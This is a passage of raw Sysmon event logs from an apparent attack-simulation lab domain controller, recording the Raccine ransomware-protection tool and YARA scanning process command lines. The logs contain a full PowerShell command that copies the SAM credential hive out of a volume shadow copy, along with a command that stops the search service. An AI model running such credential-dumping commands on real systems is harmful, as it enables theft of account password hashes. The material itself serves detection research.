19:12:50.273{9DBE88B5-5532-61B2-A708-010000000E02}7160C:\Windows\System32\net.exe10.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Net CommandMicrosoft® Windows® Operating SystemMicrosoft Corporationnet.exe"C:\Windows\system32\net.exe" STOP WSEARCHC:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=C6B6DAA95CEA707F8D986D933E4A9596,SHA256=FDDC5F29F779A6EF73D70A2C551397FDEE63F549F2BCE4FE6A7AEEDC11F4F72E,IMPHASH=C41B15F592DE4589047CE5119CE87468{9DBE88B5-5532-61B2-A608-010000000E02}7540C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" STOP WSEARCH 10341000x80000000000000002244585Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.232{9DBE88B5-3AAE-61AE-0EA8-000000000E02}68046848C:\Windows\system32\conhost.exe{9DBE88B5-5532-61B2-A608-010000000E02}7540C:\Program Files\Raccine\Raccine.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002244580Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.229{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-5532-61B2-A608-010000000E02}7540C:\Program Files\Raccine\Raccine.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002244579Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.229{9DBE88B5-3AAE-61AE-0DA8-000000000E02}67766968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{9DBE88B5-5532-61B2-A608-010000000E02}7540C:\Program Files\Raccine\Raccine.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+ca360024(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e347d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e30b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+ca2ab3e6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97a002a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c9803a9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e5aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e5aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e593c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97d665c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e3b9e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e3710(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e347d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e30b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+ca2ab3e6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97c8363(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97c78d5(wow64) 154100x80000000000000002244578Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.229{9DBE88B5-5532-61B2-A608-010000000E02}7540C:\Program Files\Raccine\Raccine.exe1.4.2.0 BETAA Simple Ransomware Vaccine - see https://github.com/Neo23x0/RaccineRaccineRaccineRaccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" STOP WSEARCHC:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=287F6CFBFFD83B75A0F8F749B0F636F3,SHA256=E5364CE4BD1814E003215BFF10DD2F191C33199260DFD2688D4F6CCE4A7C75B8,IMPHASH=B9673CBFF2550CFBFA1668EF53412C24{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x80000000000000002165805Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:17.094{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-3BBF-61B2-8305-010000000E02}7852C:\Program Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002165790Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:17.086{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002165724Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:17.044{9DBE88B5-C32E-61A8-0C00-000000000E02}8485240C:\Windows\system32\svchost.exe{9DBE88B5-3BBF-61B2-8305-010000000E02}7852C:\Program Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002165722Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:17.038{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-3BBF-61B2-8305-010000000E02}7852C:\Program Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002165707Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:17.030{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002165641Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:16.990{9DBE88B5-C32E-61A8-0C00-000000000E02}8485240C:\Windows\system32\svchost.exe{9DBE88B5-3BBF-61B2-8305-010000000E02}7852C:\Program Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002165640Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:16.989{9DBE88B5-3BBF-61B2-8305-010000000E02}78525916C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Raccine\Raccine.exe+c914|C:\Program Files\Raccine\Raccine.exe+1e7b|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002165638Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:16.984{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-3BBF-61B2-8305-010000000E02}7852C:\Program Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002165623Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:16.976{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002165557Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:16.930{9DBE88B5-C32E-61A8-0C00-000000000E02}8485240C:\Windows\system32\svchost.exe{9DBE88B5-3BBF-61B2-8305-010000000E02}7852C:\Program Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002165556Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:16.930{9DBE88B5-3BBF-61B2-8305-010000000E02}78525916C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BBF-61B2-8405-010000000E02}7620C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Raccine\Raccine.exe+c914|C:\Program Files\Raccine\Raccine.exe+1d80|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x80000000000000002165555Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:16.925{9DBE88B5-3BBF-61B2-8305-010000000E02}7852ATTACKRANGE\AdministratorC:\Program Files\Raccine\Raccine.exeC:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac10A6.tmpMD5=8D83BF4690F88A5E77EB9980E5517DB4,SHA256=997F52D18A246E33B586CD032E13DC4AB052DF902992218298827942FAAE786E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002165548Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.575{9DBE88B5-3BBF-61B2-9B05-010000000E02}38127324C:\Program Files\Raccine\yara64.exe{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Raccine\yara64.exe+8503f|C:\Program Files\Raccine\yara64.exe+7ce90|C:\Program Files\Raccine\yara64.exe+73b07|C:\Program Files\Raccine\yara64.exe+7303c|C:\Program Files\Raccine\yara64.exe+17c129|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002165545Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.562{9DBE88B5-3BBF-61B2-9C05-010000000E02}5664136C:\Windows\system32\conhost.exe{9DBE88B5-3BBF-61B2-9B05-010000000E02}3812C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002165539Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.550{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-3BBF-61B2-9B05-010000000E02}3812C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002165538Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.549{9DBE88B5-3BBF-61B2-8305-010000000E02}78525916C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BBF-61B2-9B05-010000000E02}3812C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+116f5|C:\Program Files\Raccine\Raccine.exe+6156|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002165537Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.549{9DBE88B5-3BBF-61B2-9B05-010000000E02}3812C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\in-memory\gen_loaders.yar" 6776 -d MemoryScan=1 -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {write-host \''\''$shadowlist = get-wmiobject win32_shadowcopy$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]$shadowpath = \''\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\'' + $maxvolume + \''\Windows\System32\config\SAM\''$mydump = $ENV:temp + '\' + 'myhive'[System.IO.File]::Copy($shadowpath , $mydump)} mp)} " -d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BBF-61B2-8305-010000000E02}7852C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""\"" $shadowlist = get-wmiobject win32_shadowcopy $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] $shadowpath = \""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\"" + $maxvolume + \""\Windows\System32\config\SAM\"" $mydump = $ENV:temp + '\' + 'myhive' [System.IO.File]::Copy($shadowpath , $mydump)} 10341000x80000000000000002165534Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.533{9DBE88B5-3BBF-61B2-9A05-010000000E02}81246204C:\Windows\system32\conhost.exe{9DBE88B5-3BBF-61B2-9905-010000000E02}4252C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002165528Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.520{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-3BBF-61B2-9905-010000000E02}4252C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002165527Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.520{9DBE88B5-3BBF-61B2-8305-010000000E02}78525916C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BBF-61B2-9905-010000000E02}4252C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002165526Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.520{9DBE88B5-3BBF-61B2-9905-010000000E02}4252C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\ryuk-commandlines.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac10A6.tmp -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {write-host \''\''$shadowlist = get-wmiobject win32_shadowcopy$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]$shadowpath = \''\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\'' + $maxvolume + \''\Windows\System32\config\SAM\''$mydump = $ENV:temp + '\' + 'myhive'[System.IO.File]::Copy($shadowpath , $mydump)} mp)} " -d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d 